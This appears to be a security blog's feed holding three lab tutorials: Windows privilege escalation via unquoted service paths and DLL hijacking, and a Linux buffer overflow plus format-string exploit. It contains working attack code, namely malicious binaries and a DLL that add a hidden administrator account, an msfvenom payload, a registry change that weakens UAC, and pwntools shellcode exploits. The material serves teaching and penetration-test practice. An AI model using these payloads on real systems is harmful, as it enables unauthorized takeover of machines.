After setting everything up, it&apos;s time to create the service. I used `sc.exe`, but you could also use PowerShell&apos;s &quot;New-Service&quot;:

```powershell
# Create a service with sc.exe
sc.exe create BadPath binPath= &quot;C:\Program Files\Kayssel Archive\Vuln Service\vulnerable.exe&quot; start= auto

# Create a service with New-Service
New-Service -Name &quot;BadPath&quot; -BinaryPathName &quot;C:\Program Files\Kayssel Archive\Vuln Service\vulnerable.exe&quot;


```

Once the service is created, we can manage it using PowerShell.

![](/content/images/2023/12/image-3.png)

Service management with PowerShell

To assign the required permissions for privilege escalation to a specific user, use this PowerShell script:

```powershell
# Install the Carbon module if you do not already have it
Install-Module -Name &apos;Carbon&apos; -Force -AllowClobber

# Import the Carbon module
Import-Module Carbon

# Define service name and user name (must match the service created above)
$serviceName = &quot;BadPath&quot;
$userName = &quot;beruinsect&quot;

# Grant the user permission to start, stop, and reconfigure the service
Grant-ServicePermission -Name $serviceName -Identity $userName -FullControl

```

To avoid the vulnerability, the service path should be enclosed in quotes:

```powershell
sc create BadPath binPath= &quot;\&quot;C:\Program Files\Kayssel Archive\Vuln Service\vulnerable.exe\&quot;&quot; start= auto

New-Service -Name &quot;BadPath&quot; -BinaryPathName &apos;&quot;C:\Program Files\Kayssel Archive\Vuln Service\vulnerable.exe&quot;&apos;


```

While this corrects the path issue, it doesn&apos;t address the broader vulnerability due to the permissions granted to &quot;beruinsect&quot;. We&apos;ll explore this more towards the end of the chapter.

With the lab setup complete, let&apos;s move on to simulating a privilege escalation attack.

# **The Art of the Attack: Exploiting Unquoted Service Paths**

For this attack, I&apos;m using the user &quot;beruinsect&quot;, a standard user not in the administrators&apos; group. To detect the vulnerability, we can use Winpeas, just as we did with [DLL hijacking](https://www.kayssel.com/post/dll-hijacking/):

```powershell
.\winpeas.exe | tee win_report.txt

```

![](/content/images/2023/12/image-10.png)

Winpeas execution

&lt;details&gt;
&lt;summary&gt;Winpeas Execution and Results Filtering:&lt;/summary&gt;

```powershell
cat .\win_report.txt | select-string &quot;No quotes and space detected&quot;

```
&lt;/details&gt;


![](/content/images/2023/12/image-9.png)

Filtering of results

This will reveal the vulnerable path we created. Another tool for identifying escalation vectors is PowerUp, which you can find here:

[PowerTools/PowerUp/PowerUp.ps1 at master · PowerShellEmpire/PowerTools](https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1)

&lt;details&gt;
&lt;summary&gt;PowerUp can be executed on the victim machine to detect vulnerable services:&lt;/summary&gt;

```powershell
# Import and execute PowerUp
Import-Module .\PowerUp.ps1
Get-ServiceUnquoted -Verbose
```
&lt;/details&gt;


![](/content/images/2023/12/image-12.png)

Vulnerable services detected by PowerUp

Additionally, you can manually inspect the services and their paths in PowerShell:

```powershell
Get-WmiObject -Query &quot;SELECT * FROM Win32_Service&quot; | Select-Object DisplayName, PathName

```

![](/content/images/2023/12/image-19.png)

&lt;details&gt;
&lt;summary&gt;Services and their corresponding path&lt;/summary&gt;

```powershell
Get-Service

```
&lt;/details&gt;


![](/content/images/2023/12/image-18.png)

Services
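The check these tools automate can also be approximated by hand against the WMI output above. A hedged Python sketch of the heuristic (simplified — winPEAS and PowerUp apply additional rules):

```python
def is_unquoted_vulnerable(path_name):
    # Flag service paths that contain a space before the executable name,
    # are not wrapped in quotes, and live outside the protected
    # C:\Windows tree (where normal users cannot write anyway).
    path = path_name.strip()
    if path.startswith('"'):
        return False
    exe = path.lower().split('.exe')[0] + '.exe'  # drop trailing arguments
    return ' ' in exe and not exe.startswith('c:\\windows')

print(is_unquoted_vulnerable(r'C:\Program Files\Kayssel Archive\Vuln Service\vulnerable.exe'))
print(is_unquoted_vulnerable('"C:\\Program Files\\Good Service\\good.exe" -arg'))
```

Feeding each `PathName` from the WMI query through a filter like this reproduces, roughly, the detection both tools perform.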

Once we&apos;ve located the vulnerable path, it&apos;s time to craft a binary that exploits this weakness. Here&apos;s a simple C program for creating a user with administrative rights:

```c
#include &lt;stdlib.h&gt;

int main() {
  system(&quot;net user rsgbengi Password123 /add&quot;);
  system(&quot;net localgroup administrators rsgbengi /add&quot;);
}

```

To compile the program, we can use the following command. The binary must be named &quot;Vuln.exe&quot;: since the next path component is &quot;Vuln Service&quot;, Windows will try &quot;C:\Program Files\Kayssel Archive\Vuln.exe&quot; before the real binary, so our malicious code executes when the vulnerable service starts.

```bash
x86_64-w64-mingw32-gcc-win32 vuln.c -o Vuln.exe

```

Transfer this binary to the target using a Python server and wget:

![](/content/images/2023/12/image-7.png)

Transfer of the file Vuln.exe

```powershell
wget http://192.168.1.146:9000/Vuln.exe -OutFile Vuln.exe

```

![](/content/images/2023/12/image-6.png)

Use wget to leave the file in the vulnerable path

After starting the service, an error might occur, but our malicious user will be created successfully. Verify the user&apos;s administrative privileges with Crackmapexec (remember to disable UAC as mentioned in the previous chapter).

![](/content/images/2023/12/image-8.png)

User created successfully

![](/content/images/2023/12/image-14.png)

Checking that the user has administrator privileges

# **Beyond the Attack: Understanding Broader Implications**

Our service configuration also exposes another flaw: giving a standard user full control over an administrator-level service can allow them to alter its functionality. For example, they could change the service to create another user with administrative privileges:

```powershell
sc.exe config &quot;BadPath&quot; binpath= &quot;net user stillVulnerable Password1 /add&quot;

```

![](/content/images/2023/12/image-17.png)

# **Wrapping Up: Key Takeaways and Next Steps**

As we wrap up this chapter on Unquoted Service Path vulnerabilities in Windows, we&apos;ve covered significant ground: dissecting the nature of this common yet critical vulnerability, building our own lab, and executing a successful privilege escalation attack. The blend of theory and practice provides a solid foundation for anyone working in Windows environments, whether in professional penetration testing, preparing for certifications like the OSCP, or simply deepening personal knowledge.

Looking forward, staying ahead in cybersecurity means continuously learning and adapting. The skills developed here are stepping stones to more advanced techniques, so stay curious, keep experimenting, and join us for the next chapters in this series.

# Resources

[GitHub - CoreProgramm/Windows-Service-Threading: In this CoreProgramm you find how to create and Install Windows Service using Threading class.](https://github.com/CoreProgramm/Windows-Service-Threading/tree/master)

[Windows Privilege Escalation: Unquoted Service Path - Hacking Articles](https://www.hackingarticles.in/windows-privilege-escalation-unquoted-service-path/)</content:encoded><author>Ruben Santos</author></item><item><title>DLL Hijacking: Understanding, Detecting, and Exploiting Privilege Escalation on Windows</title><link>https://www.kayssel.com/post/dll-hijacking</link><guid isPermaLink="true">https://www.kayssel.com/post/dll-hijacking</guid><description>In this guide, we explore DLL hijacking for privilege escalation in Windows. It covers detecting vulnerabilities using Winpeas, creating a malicious DLL, and overcoming User Account Control (UAC) obstacles, demonstrating real-world implications.</description><pubDate>Sun, 03 Dec 2023 18:31:53 GMT</pubDate><content:encoded># Introduction

Welcome to an insightful exploration of privilege escalation within Active Directory environments, a critical aspect of modern cybersecurity. In this series, we delve into various techniques commonly employed for escalating privileges, ranging from those applicable to individual Windows machines to those more intricately linked to Active Directory itself.

Our journey begins with a focus on one of the most renowned methods: DLL hijacking. This chapter will enlighten you on what DLL hijacking entails, how it can be leveraged for privilege escalation, and methods to identify applications vulnerable to this exploit.

This series is designed to not only impart knowledge about these techniques but also to provide practical insights into their application and detection. With a blend of theory and hands-on examples, we aim to equip you with the skills necessary to navigate and secure complex Active Directory environments. So, let&apos;s embark on this educational journey together!

# **Understanding DLL Hijacking**

DLL hijacking, also known as &quot;DLL preloading&quot; or &quot;binary planting,&quot; is a security vulnerability in which an executable program, like an application or service, loads a Dynamic Link Library (DLL) from an unintended, attacker-controllable location. To put it simply, it involves impersonating a DLL that an application expects to load but cannot find. When a DLL is absent from the application&apos;s own directory and the Windows system directories, Windows falls back to searching each directory listed in the &quot;PATH&quot; environment variable, which can be displayed using the command `echo %PATH%`.

![](/content/images/2023/11/image-107.png)

PATH environment variable

If the DLL is absent in the application&apos;s own path, Windows then looks for it in each of the PATH entries. Our goal is to identify applications searching for non-existent DLLs or DLLs in paths where we have write access. Once we find such a location, we create a malicious DLL to replace the missing one. This tactic becomes effective when the corresponding application service is restarted or executed by a user with higher privileges, enabling actions like privilege escalation. Notably, DLL hijacking can also be employed as a method for maintaining persistence on a machine, a topic we&apos;ll explore in a future series on red team techniques.

![](/content/images/2023/12/image.png)

Diagram of the Attack
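To make the search order concrete, here&apos;s a small Python sketch. The ordering below reflects the standard SafeDllSearchMode sequence (an assumption worth verifying on the target, since registry settings can change it); the helper lists PATH entries the current user could plant a DLL in:

```python
import os

# Standard SafeDllSearchMode order (assumption: documented default);
# PATH entries are searched last, after the system directories.
SEARCH_ORDER = [
    'application directory',
    'system directory (System32)',
    '16-bit system directory (System)',
    'Windows directory',
    'current working directory',
    'directories in %PATH%, in order',
]

def writable_path_entries(path_env):
    # PATH entries where the current user can create files -- each one
    # is a potential planting spot for a DLL missing everywhere earlier.
    return [d for d in path_env.split(os.pathsep)
            if d and os.path.isdir(d) and os.access(d, os.W_OK)]

print(writable_path_entries(os.environ.get('PATH', '')))
```

A DLL that is missing from every earlier location but resolvable through a writable PATH entry is exactly the situation this chapter exploits.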

# **Detecting DLL Hijacking Vulnerabilities**

Moving from theory to practice, let&apos;s explore how to detect DLL hijacking vulnerabilities on a machine. A widely-used tool for automating the detection of privilege escalation vectors is [Winpeas](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS). To utilize Winpeas, it first needs to be uploaded to the target machine. For this task, I&apos;ve employed Python to create an HTTP server and used wget on Windows to transfer the binary:

```powershell
wget http://192.168.1.146:9000/winpeas.exe -OutFile winpeas.exe

```

![](/content/images/2023/11/image-105.png)

Python server to pass files

After successfully uploading the file, execute it and save the results with the command:

```powershell
.\winpeas.exe | tee winpeas_report.txt

```

![](/content/images/2023/11/image-108.png)

Search for DLL hijacking

In our focus on DLL hijacking, we search for indications within the console output. In this instance, it shows that our user has full access to the &quot;dll\_privilege&quot; folder, suggesting the possibility of modifying DLLs within this directory, thereby impacting the associated application.

Additionally, we can leverage the Sysinternals Process Monitor tool to identify events related to missing DLLs. A deeper look into this tool and its application will be discussed in the upcoming section, providing further insights into understanding this vulnerability.

[Process Monitor - Sysinternals](https://learn.microsoft.com/en-us/sysinternals/downloads/procmon)

# **Demonstrating DLL Hijacking**

To illustrate DLL hijacking, I&apos;ve developed a simple C program that searches for a specific DLL and reports its presence. The program&apos;s code is straightforward:

```c
#include &lt;windows.h&gt;
#include &lt;stdio.h&gt;

int main(void)
{
    HINSTANCE hDll;

    hDll = LoadLibrary(TEXT(&quot;vulnerable.dll&quot;));

    if (hDll != NULL)
    {
        printf(&quot;DLL Found\n&quot;);
        FreeLibrary(hDll);  // release the handle once we are done
    }
    else
    {
        printf(&quot;DLL Not found\n&quot;);
    }
    return 0;
}

```

In conjunction with this, the targeted DLL, when loaded, displays a confirmation message:

```c
#include &lt;windows.h&gt;

BOOL WINAPI DllMain (HANDLE hDLL, DWORD dwReason, LPVOID lpReserved) {
    switch (dwReason){
        case DLL_PROCESS_ATTACH:
            MessageBox(NULL,&quot;DLL Loaded!&quot;,&quot;Dll example&quot;,MB_ICONERROR | MB_OK);
            break;

    }
    return TRUE;
}

```

To compile both components, the following commands are used:

```bash
x86_64-w64-mingw32-gcc-win32 vulnerable.c -o vulnerable.exe
x86_64-w64-mingw32-gcc-win32 lib.c -o vulnerable.dll -shared

```

After compiling the binary, our next step is to transfer it to the target machine for testing. When we execute the binary without the accompanying DLL, an interesting observation emerges: the application explicitly reports that the DLL is not found.

![](/content/images/2023/11/image-110.png)

DLL not found

To delve deeper into the application&apos;s behavior and the events it triggers, we turn to Process Monitor. By utilizing this tool, we can apply two specific filters: one to identify missing values and another to highlight files ending in &quot;.dll&quot;.

![](/content/images/2023/11/image-94.png)

Upon applying these filters in Process Monitor, we&apos;re able to observe a revealing outcome. A log is generated, clearly indicating that the &quot;vulnerable.dll&quot; library, which our application is attempting to access, could not be found.

![](/content/images/2023/11/image-95.png)

Process Monitor events captured

While this technique effectively identifies missing DLLs, it&apos;s primarily used for practice and demonstration purposes. In real-world scenarios, especially on compromised machines, we typically wouldn&apos;t have Process Monitor pre-installed.

Conversely, when the DLL is present, the process yields a different result: a message promptly appears, confirming that the DLL has been successfully loaded.

![](/content/images/2023/11/image-109.png)

DLL loaded successfully

For demonstration purposes, let&apos;s consider a scenario where the DLL is not found. In such a case, we have the option to create a malicious DLL. A popular tool for this is msfvenom. As an example, using the following command, we can craft a DLL that, when executed, launches the calculator application.

```bash
msfvenom -p windows/x64/exec  CMD=calc.exe -f dll -o vulnerable.dll

```

![](/content/images/2023/11/image-96.png)

Once we transfer this malicious DLL to the machine, the next phase of our demonstration unfolds. By executing the program, we can observe the payload in action.

![](/content/images/2023/11/image-93.png)

# **Lab Scenario for Privilege Escalation**

In our lab setup, I created a folder named &quot;dll\_privilege&quot; to house the application. This folder is typically accessible only by administrators. However, due to a configuration error by one of them, the user &quot;beruinsect&quot; now has full access.

![](/content/images/2023/11/image-111.png)

Vulnerable application

To replicate this scenario, the following commands were used:

```powershell
icacls &quot;C:\Program Files\dll_privilege&quot; /grant beruinsect@shadow:F

```

![](/content/images/2023/11/image-99.png)

Privileges in the folder

This command grants the &apos;beruinsect&apos; user full (write, read, and execute) permissions.

# **Demonstrating the Attack**

Imagine we&apos;ve run Winpeas and discovered that &apos;beruinsect&apos; has full access to &quot;C:\\Program Files\\dll\_privilege&quot;. Within this directory, there&apos;s an application searching for a missing &quot;vulnerable.dll&quot;. This situation is ripe for a DLL hijacking attack, which could enable privilege escalation when an administrator executes the application.

Our approach involves creating a malicious DLL that adds a user to the administrators&apos; group. Here&apos;s the code for the malicious DLL and its compilation process:

```c
#include &lt;windows.h&gt;
#include &lt;stdlib.h&gt;

BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
    switch(dwReason){
        case DLL_PROCESS_ATTACH:
            // Runs as soon as the DLL is loaded into the process
            system(&quot;net user rsgbengi Password123 /add&quot;);
            system(&quot;net localgroup administrators rsgbengi /add&quot;);
            break;
        case DLL_PROCESS_DETACH:
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
            break;
    }
    return TRUE;
}

```

```bash
x86_64-w64-mingw32-gcc-win32 evil_lib.c -o vulnerable.dll -shared

```

This code leverages the &quot;system&quot; function to create a user with administrator rights. As the attacker, we would transfer this malicious DLL to the application&apos;s folder on the victim machine.

![](/content/images/2023/11/image-112.png)

Writing the malicious DLL

Upon execution by an administrator, our embedded commands in the DLL are activated, successfully escalating privileges, as illustrated in the accompanying image.

![](/content/images/2023/11/image-103.png)

Successful privilege escalation

## **Considering User Account Control (UAC)**

It&apos;s important to note that running crackmapexec might not show the &quot;(Pwn3d!)&quot; status due to active UAC. This Windows feature prompts for confirmation when a task requires higher privileges.

![](/content/images/2023/11/image-115.png)

User created does not show as &quot;Pwn&quot;.

![](/content/images/2023/11/image-114.png)

UAC sample

To circumvent this, the following command can be used, and it can also be incorporated into the malicious DLL:

```powershell
reg add &quot;HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System&quot; /v &quot;LocalAccountTokenFilterPolicy&quot; /t REG_DWORD /d 1 /f

```

Executing this command should alter the UAC status, enabling full administrative access for the newly created user. Additionally, tools like psexec can be used for remote command execution.

![](/content/images/2023/11/image-117.png)

Disabling UAC

![](/content/images/2023/11/image-116.png)

Crackmapexec showing user as administrator

# Conclusions

In this exploration, we have delved into the intricate world of DLL hijacking, a pivotal technique in the realm of privilege escalation on Windows systems. Through our hands-on lab scenario, we have demonstrated the creation and deployment of a malicious DLL, revealing how seemingly minor oversights in system configurations can lead to significant security vulnerabilities.

Our journey highlighted the importance of tools like Winpeas for vulnerability detection and showcased the practical implications of executing a DLL hijacking attack. We also touched on the nuances of User Account Control (UAC) and how its settings can impact the success of such exploits.

As we conclude, it&apos;s evident that understanding and mitigating DLL hijacking is crucial in fortifying Windows environments against privilege escalation attacks. This chapter serves as a testament to the need for continuous vigilance and skill development in cybersecurity, preparing us for more advanced techniques in upcoming series.

# Resources

[DLL Hijacking — Part 1 : Basics](https://medium.com/techzap/dll-hijacking-part-1-basics-b6dfb8260cf1)

[GitHub - tothi/dll-hijack-by-proxying: Exploiting DLL Hijacking by DLL Proxying Super Easily](https://github.com/tothi/dll-hijack-by-proxying)</content:encoded><author>Ruben Santos</author></item><item><title>Mastering Binary Exploitation: Unleashing the Power of Format String and Buffer Overflow</title><link>https://www.kayssel.com/post/format-string-and-buffer-overflow</link><guid isPermaLink="true">https://www.kayssel.com/post/format-string-and-buffer-overflow</guid><description>In this chapter, we explore binary exploitation, focusing on buffer overflow and format string vulnerabilities. Using radare2, we pinpoint key memory addresses and adjust character counts in our exploit, overcoming challenges like unexpected compiler behavior.</description><pubDate>Tue, 21 Nov 2023 20:42:00 GMT</pubDate><content:encoded># **Introduction**

Welcome to the latest installment of our series on binary exploitation in Linux. Today, we delve deeper into this intriguing world, building on our previous exploration of format strings. In this chapter, we&apos;re set to embark on a fascinating journey: simultaneously exploiting multiple vulnerabilities. Specifically, we&apos;ll tackle both buffer overflow and format string vulnerabilities, demonstrating the intricate dance of exploiting these flaws in unison.

Our adventure today is not just about exploiting vulnerabilities; it&apos;s also a deep dive into the art of code analysis using radare2. This exploration will empower you to navigate through various challenges that might arise during exploit development, challenges often stemming from unexpected compiler behaviors.

So, buckle up and prepare for an insightful journey as we unravel the complexities of binary exploitation, step by step. Let&apos;s dive in!

# **Exploring the Vulnerable Code**

Let&apos;s dive into the heart of our discussion by examining a piece of vulnerable code. This code, while simple in function, opens the door to deeper concepts of binary exploitation.

```c
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;

/* Note: the parameter names argv/argc are swapped (argc[1] is really
   argv[1]); they are kept this way because the text refers to argc[1]. */
int main(int argv,char **argc) {
	short int zero=0;
	int *plen=(int*)malloc(sizeof(int));
	char buf[256];

	strcpy(buf,argc[1]);
	printf(&quot;%s%hn\n&quot;,buf,plen);
	while(zero);
}

```

## **How to Compile the Code**

For those who are following along, here&apos;s the command to compile this code. As always, we maintain our consistency with the compilation process.

```bash
gcc -m32 -no-pie -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -z execstack -o vulnerable vulnerable.c

```

## **Understanding the Code Dynamics**

What we&apos;ve got here is a straightforward piece of code that takes user input and displays it. Let&apos;s break down its mechanics:

1.  **Buffer Allocation:** A buffer, `buf`, is allocated. It&apos;s a storage for user input, which we fetch through the `strcpy` function. However, there&apos;s no check on the input size, hinting at a potential buffer overflow vulnerability.
2.  **Loop Control Variable:** There&apos;s a variable `zero` which plays a crucial role in controlling the program&apos;s exit. If `zero` is altered, it disrupts the flow, leading to an infinite loop.
3.  **Memory Manipulation Pointer:** Then, there&apos;s `plen`. This pointer is interesting. It writes the count of characters, printed by `printf`, into the memory. The format specifier `%hn` is key here; it writes in 2 bytes instead of the usual 4 bytes with `%n`. This peculiar use of the format string opens avenues for memory data manipulation.

**A Note on Stack Status:** It&apos;s important to remember that the actual stack status might vary in practice, which we will explore as we progress.

![](/content/images/2023/11/image-42.png)

Stack status in the function

# **Crafting the Attack Strategy**

Our primary goal with this exploit, as with many others, is to cleverly execute code by leveraging the design of the program. Let&apos;s explore our approach:

1.  **Buffer Overflow Consideration:** The most straightforward tactic might seem to be a buffer overflow attack to alter the return address. However, this strategy has a catch. If we follow this path, we inadvertently change the value of `zero`, leading to an infinite loop as the program never terminates.
2.  **Challenges with Direct Injection:** One might consider directly injecting &quot;0000&quot; at the memory location of `zero`. But, there&apos;s a twist: in ASCII, &quot;0000&quot; translates to 0x30303030 in memory, not the desired effect.

**How to Navigate These Challenges?** We&apos;ll split our approach into two critical steps:

-   **Step 1: Utilizing Buffer Overflow:** Firstly, we&apos;ll use the buffer overflow vulnerability to our advantage. This involves adjusting variable values to our desired figures and altering the return address to control the program&apos;s flow. Additionally, we&apos;ll insert a shellcode within the buffer, setting the stage for executing our code.
-   **Step 2: Avoiding the Infinite Loop:** To prevent falling into an infinite loop by modifying `zero`, we&apos;ll employ the pointer `plen`. By manipulating the memory address where `plen` points (directing it to `zero`), we can use the `printf` function and `%hn` to inject our preferred value into memory. In our case, this value is &quot;00&quot;, ensuring the program doesn&apos;t end in an infinite loop. It&apos;s essential to align the number of characters printed by `printf` with our goal - here, translating to binary &quot;00&quot;.

**Visualizing the Strategy:**

![](/content/images/2023/11/image-40.png)

Attack strategy
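The two steps translate into a single payload layout. All addresses below are hypothetical placeholders (the real ones are recovered with radare2 in the next section), and the exact offsets between buffer, `plen`, and the saved return address depend on the compiled binary — this is a sketch of the shape, not a working exploit:

```python
# All addresses are hypothetical placeholders -- recover the real ones
# with radare2, and adjust offsets to the actual stack layout.
BUF_ADDR  = 0xffffd0c0   # assumed address of buf (shellcode lands here)
ZERO_ADDR = 0xffffd1c6   # assumed address of the zero variable

shellcode = b'\x90' * 32                     # placeholder NOP sled
padding   = b'A' * (65536 - len(shellcode))  # printf must emit 0x10000 chars

payload = shellcode + padding
payload += ZERO_ADDR.to_bytes(4, 'little')   # overwrite plen so it points at zero
payload += BUF_ADDR.to_bytes(4, 'little')    # overwrite the saved return address

print(len(payload))  # 65544
```

The key invariant is the first two lines of the payload: shellcode plus padding must total exactly 0x10000 bytes so that `%hn` writes zero.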

# **Building the Exploit Step-by-Step**

Developing an exploit requires a meticulous approach. Let&apos;s walk through the stages of crafting our exploit, ensuring we manipulate the `zero` variable effectively.

The success of our exploit hinges on the precision of the character count. To inject &quot;00&quot; into the `zero` variable, we must print exactly 65536 characters (0x10000 in hexadecimal), so that `%hn` stores the low 16 bits — zero — at the address `plen` points to. The input itself reaches memory through the `strcpy` call on `argc[1]`.

![](/content/images/2023/11/image-44.png)

Characters to be displayed on the screen
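The arithmetic is easy to sanity-check: `%hn` stores only the low two bytes of the running character count, so printing exactly 0x10000 characters writes zero:

```python
printed = 65536                 # characters emitted before %hn is reached
stored = printed & 0xFFFF       # %hn keeps only the low 2 bytes
print(hex(printed), stored)     # 0x10000 0
```

Any count that is a multiple of 0x10000 would work equally well; 65536 is simply the smallest.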

Next, we turn to radare2 for debugging purposes. By opening and parsing the executable with this tool, our aim is to precisely pinpoint the address of the `buf` variable. This step is crucial as it allows us to understand exactly where our injected data resides in memory, setting the stage for the subsequent steps in our exploit development process.

```bash
r2 ./vulnerable
aaa

```

Setting a breakpoint at the `strcpy` function, we prepare to run our crafted payload:

```bash
db &lt;address&gt;

```

![](/content/images/2023/11/image-46.png)

Breaking point

&lt;details&gt;
&lt;summary&gt;Our initial payload looks like this:&lt;/summary&gt;

```python
from pwn import * 
import sys

payload = b&apos;A&apos;*65536
sys.stdout.buffer.write(payload)

```
&lt;/details&gt;


&lt;details&gt;
&lt;summary&gt;Executing it in radare2:&lt;/summary&gt;

```bash
ood &quot;`!python3 exploit.py`&quot;

```
&lt;/details&gt;


After executing our setup, the next step is straightforward. We&apos;ll use the command &quot;dc&quot; to progress to the breakpoint. Following this, we&apos;ll employ the command &quot;v&quot; to reveal the contents of the eax register. Why eax, you ask? Well, in this scenario, eax holds the key to our puzzle – it contains the address of `buf`. This happens because of how the function handles its arguments: `buf` is transferred to eax and then strategically positioned on the stack, paving the way for `strcpy` to do its job effectively. It&apos;s worth noting that in my specific use of radare2, `buf` is referred to as &quot;dest,&quot; a minor but crucial detail to keep in mind.

![](/content/images/2023/11/image-47.png)

dest as the name of the variable buf

Upon successful execution and positioning ourselves at the designated instruction, an interesting revelation unfolds. We can observe that the memory address of `buf` now holds the content we&apos;ve meticulously crafted and passed through our exploit. This is a pivotal moment in our journey of exploit development, as it visually confirms the successful manipulation of the program&apos;s memory – a clear indicator that our exploit is on the right track.

![](/content/images/2023/11/image-48.png)

buf memory address

Now at this crucial juncture, our next objective is to pinpoint and modify the memory address of the `zero` variable using `plen`. To achieve this, we turn to the command &quot;afvd&quot; in our toolkit. This command is quite handy as it displays the variables along with their respective values in the current context. Through this process, we identify that in our memory landscape, `var_6h` is the label for `zero`, and intriguingly, `var_ch` represents `plen`. This information is vital as it lays the groundwork for the precise memory manipulation required for our exploit to succeed.

![](/content/images/2023/11/image-49.png)

Variables values

This insightful deduction comes from a close examination of the program&apos;s assembly code. If we observe the assembly code, as illustrated in the accompanying figure, we notice that `var_6h` is established right at the outset and is initialized with a value of 0. This clearly suggests its role as the `zero` variable. Similarly, `var_ch` emerges as a key player during the stack preparation phase, particularly in the lead-up to calling `printf` alongside `dest` (which we&apos;ve previously identified as `buf`). This contextual placement strongly implies that `var_ch` is indeed what we refer to as `plen`. These subtle hints hidden within the assembly code are crucial for understanding and manipulating the program&apos;s behavior.

![](/content/images/2023/11/image-50.png)

Zero and plen in memory

Armed with this crucial data, we are now in a position to construct a fully functional exploit.

```python
from pwn import *
import sys

buf_addr = &lt;change&gt;
buf_size = 256
zero_addr = &lt;change&gt;
shellcode = shellcraft.echo(&quot;hello\n&quot;)

payload = b&quot;\x90&quot; * 80                              # NOP sled
payload += asm(shellcode)
payload += b&quot;D&quot; * (256 - 80 - len(asm(shellcode)))  # fill the rest of buf
payload += p32(zero_addr)  # plen -&gt; address of zero
payload += b&quot;AA&quot;           # zero (value irrelevant)
payload += p32(buf_addr)   # ebp (value irrelevant)
payload += p32(buf_addr)   # return address -&gt; buf
payload += b&quot;C&quot; * (65536 - 256 - 14)                # pad to exactly 65536
sys.stdout.buffer.write(payload)

```

The payload is a direct implementation of the strategy outlined earlier. We first fill `buf` with a NOP sled, follow it with shellcode that prints a simple &quot;hello&quot;, and cap the remaining space in `buf` with &quot;D&quot; characters. The crux of the payload is placing the memory address of `zero` where `plen` lives; after it come the saved `ebp` and the return address, which we point back at `buf`. Finally, we pad with &quot;C&quot; characters until the total reaches the exact character count the exploit requires. Note that the actual values written over `zero` and `ebp` are irrelevant here; they are placeholders.
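
The byte accounting above can be verified mechanically. A small sketch with the sizes from the payload (the shellcode length is a placeholder, since the output of `shellcraft.echo` varies):

```python
# Byte accounting for the first payload (shellcode length assumed)
nop_sled = 80
shellcode_len = 35            # placeholder; len(asm(shellcode)) in practice
d_pad = 256 - nop_sled - shellcode_len
tail = 4 + 2 + 4 + 4          # plen pointer, zero, ebp, return address
c_pad = 65536 - 256 - tail    # the final run of C characters
assert nop_sled + shellcode_len + d_pad + tail + c_pad == 65536
assert tail == 14             # matches the 14 subtracted in the payload
```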

However, an interesting observation arises when we run this exploit: it leads to an infinite loop. This unexpected behavior signals that there&apos;s more to explore and adjust in our exploit development process.

![](/content/images/2023/11/image-51.png)

Infinite loop

So, what went awry? To unravel this mystery, a deeper dive into the binary is essential. Given that our primary issue is the infinite loop, our focus shifts to verifying whether the `zero` variable is being modified as intended. To do this, we&apos;ll zero in on the state of the program immediately following the execution of `strcpy`. This targeted approach will allow us to scrutinize the relevant changes and interactions at a critical juncture in the exploit&apos;s execution, shedding light on why the infinite loop is occurring.

![](/content/images/2023/11/image-54.png)

After reaching the crucial point post-`strcpy` execution, our next step is to reapply the &quot;afvd&quot; command. This time, our goal is to acquire the memory address of the variable `var_ch`, which we know represents `plen`. Following this, we&apos;ll employ the &quot;pd&quot; command to delve into the memory and examine the contents of `var_ch`. This process is vital for understanding how our exploit interacts with the memory and will provide valuable insights into the state and behavior of `plen` within the program&apos;s memory structure.

![](/content/images/2023/11/image-57.png)

In the provided image, we get a clear view of the stack&apos;s contents, offering us a crucial checkpoint in our analysis. This visual representation confirms that our buffer overflow attempt has indeed been successful – evidenced by the injection of memory addresses and the presence of &quot;AA&quot; characters (represented in hexadecimal as 41). However, there&apos;s a twist: the number of characters isn&apos;t aligned as anticipated. The data appear to be in disarray. A closer examination reveals that the intended return address has been inadvertently occupied by the &quot;C&quot; padding, not the actual buffer address as planned. Additionally, the ebp (base pointer) is not positioned correctly. To better understand this misalignment, let&apos;s turn to a diagram for a more visual explanation:

![](/content/images/2023/11/image-58.png)

To achieve the correct alignment, we deduce that 6 more characters are needed. This raises the question: how did the oversight occur in our initial calculations?

![](/content/images/2023/11/image-59.png)

Sample of defined variables

The root of our miscalculation is an unexpected twist introduced by the compiler: it reserved stack space for `plen` twice, throwing our original calculations off balance. Inspecting the main function&apos;s variables in the image above, both `var_ch` and `plen` occupy more space on the stack than we initially accounted for, which alters the memory layout our exploit was built on. To grasp this alteration and its impact, the following image lays out the current stack situation:

![](/content/images/2023/11/image-60.png)

Moreover, a closer examination of `var_ch` reveals another crucial detail: contrary to the typical 4-byte occupation, it actually occupies 6 bytes. Armed with this revelation and the insights previously gathered, we&apos;re now poised to revise our exploit accordingly. Let&apos;s take a look at how the updated exploit might be structured:

```python
from pwn import *
import sys

buf_addr = 0xfffecf4c
buf_size = 256
zero_addr = 0xfffed052  # buf_addr + buf_size + 4 + 2
shellcode = shellcraft.echo(&quot;hello\n&quot;)

payload = b&quot;\x90&quot; * 80
payload += asm(shellcode)
payload += b&quot;D&quot; * (256 - 80 - len(asm(shellcode)))
payload += p32(zero_addr)  # var_ch
payload += b&quot;EE&quot;           # 2 extra bytes of var_ch
payload += b&quot;AA&quot;           # zero
payload += b&quot;EEEE&quot;         # plen
payload += p32(buf_addr)   # ebp
payload += p32(buf_addr)   # return address
payload += b&quot;C&quot; * (65536 - 256 - 20)
sys.stdout.buffer.write(payload)

```
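
As a cross-check of the constants used in the revised script, here is the arithmetic in a short Python sketch (addresses come from the radare2 session above and will differ on another run):

```python
# zero sits past buf, the 4-byte var_ch slot, and its 2 extra bytes
buf_addr = 0xfffecf4c
buf_size = 256
zero_addr = buf_addr + buf_size + 4 + 2
assert zero_addr == 0xfffed052
# the tail also grew from 14 to 20 bytes: 4+2 (var_ch), 2 (zero),
# 4 (plen), 4 (ebp), 4 (return address)
assert (4 + 2) + 2 + 4 + 4 + 4 == 20
```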

Upon executing our revised exploit within radare2, we can observe a satisfying alignment: all the values now correspond precisely as intended.

![](/content/images/2023/11/image-61.png)

By completing the execution process, we reach a pivotal moment: the successful execution of our code is now evident.

![](/content/images/2023/11/image-37.png)
